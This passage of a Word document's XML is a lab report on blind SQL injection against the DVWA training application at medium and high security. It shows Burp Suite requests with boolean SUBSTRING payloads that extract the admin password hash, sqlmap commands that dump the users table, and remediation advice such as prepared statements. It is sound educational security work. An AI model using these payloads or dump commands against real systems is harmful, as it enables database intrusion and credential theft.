          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirmed the oracle: page returned "User ID exists" for TRUE condition, blank for FALSE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload Used in Burp Suite Repeater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POST /vulnerabilities/sqli_blind/ HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: 10.114.186.145</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie: PHPSESSID=tqg2sm7p30bqvoo3pr70ov8v84; security=medium</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">id=1 AND SUBSTRING((SELECT password FROM users WHERE user='admin'),1,1)='5'#&amp;Submit=Submit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Response: HTTP/1.1 200 OK  |  5,021 bytes  |  1,126 ms</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Body contains: User ID exists in the database.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt; Condition TRUE: first character of admin password hash is '5' (confirmed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidence — Figure 2: Burp Suite Repeater (Medium Security)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6000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37185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2: Burp Suite Repeater showing POST-based boolean blind injection at Medium security level. The response (200 OK, 5,021 bytes) confirms the condition evaluated as TRUE, bypassing both the dropdown control and escape function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLMap Command for Medium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 \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  --cookie="PHPSESSID=tqg2sm7p30bqvoo3pr70ov8v84; security=medium" \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  --data="id=1&amp;Submit=Submit" \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  --batch --technique=B --threads=5 \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -D dvwa -T users -C user,password --dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.5 High Security Level — Injecting via a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Security Level</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High</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Protection Added</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Input moved to separate cookie-input page + LIMIT 1 appended</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Bypass Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBF0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Intercept and modify the id cookie in Burp Suite Repeater</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Injection Type</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String-based (via cookie header)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /vulnerabilities/sqli_blind/cookie-input.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">At High security, DVWA significantly changes the input mechanism: user input is now submitted through a separate popup page (/vulnerabilities/sqli_blind/cookie-input.php) which stores the value in an id cookie. The main page reads this cookie and inserts it directly into the SQL query. An additional LIMIT 1 clause is appended to the query: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SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Despite these changes, the injection point is merely relocated — not eliminated. The id cookie value is still unsanitized. The LIMIT 1 clause is neutralized by appending a SQL comment character (#) at the end of the payload, which causes the database to ignore all trailing SQL including the LIMIT clause.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation via Burp Suite Cookie Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercepted the POST request to cookie-input.php when the popup page submitted a value.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sent to Repeater and replaced the id= POST body value with the injection payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The server's Set-Cookie response header confirmed the injected payload was stored as the id cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The main DVWA page subsequently evaluated the injected cookie and returned the oracle response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload Used in Burp Suite Repeater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POST /vulnerabilities/sqli_blind/cookie-input.php HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: 10.114.186.145</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie: PHPSESSID=tqg2sm7p30bqvoo3pr70ov8v84; security=high</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">id=1' AND SUBSTRING((SELECT password FROM users WHERE user='admin'),1,1)='5'#&amp;Submit=Submit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Response: HTTP/1.1 200 OK  |  1,378 bytes  |  1,170 ms</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Set-Cookie: id=1%27+AND+SUBSTRING%28...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Body: Cookie ID set!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt; Payload stored as cookie. Main page evaluates injected id cookie.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">-&gt; Oracle confirmed: first character of admin password hash is '5' (TRUE).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidence — Figure 3: Burp Suite Repeater (High Security — Cookie Injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6000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7185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3: Burp Suite Repeater at High security. The POST body to cookie-input.php contains the SQL injection payload. The Set-Cookie response header (visible in the Response panel) confirms the payload was stored and will be evaluated by the main page on next load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQLMap Command for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 \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  --cookie="PHPSESSID=tqg2sm7p30bqvoo3pr70ov8v84; security=high; id=1*" \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  --batch --technique=B --threads=5 \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  -D dvwa -T users -C user,password --dump</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">-- The * marks the injection point within the cookie header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Use Parameterized Queries (Prepared Statements)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The root cause of all findings is direct string concatenation of user-supplied input into SQL queries. Replace all dynamic queries with parameterized queries (also called prepared statements). Parameterized queries separate SQL code from data, making injection structurally impossible regardless of the input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 Vulnerable (current code):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// Fixed (parameterized query):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">$stmt = $pdo-&gt;prepare("SELECT first_name, last_name FROM users WHERE user_id = ?");</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">$stmt-&gt;execute([$id]);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Input Validation and Whitelisting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate all input on the server side. For the id parameter, only integer values are valid. Reject any input that does not match the expected format before it reaches the database layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Principle of Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The database user account used by the application should only have SELECT permissions on the specific tables it needs. Revoke INSERT, UPDATE, DELETE, and especially DROP permissions. This limits the blast radius if injection does occur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Deploy a Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A WAF adds a detection and blocking layer for common SQL injection patterns. While not a replacement for secure coding practices, a WAF provides an important defence-in-depth control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 Upgrade Server Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
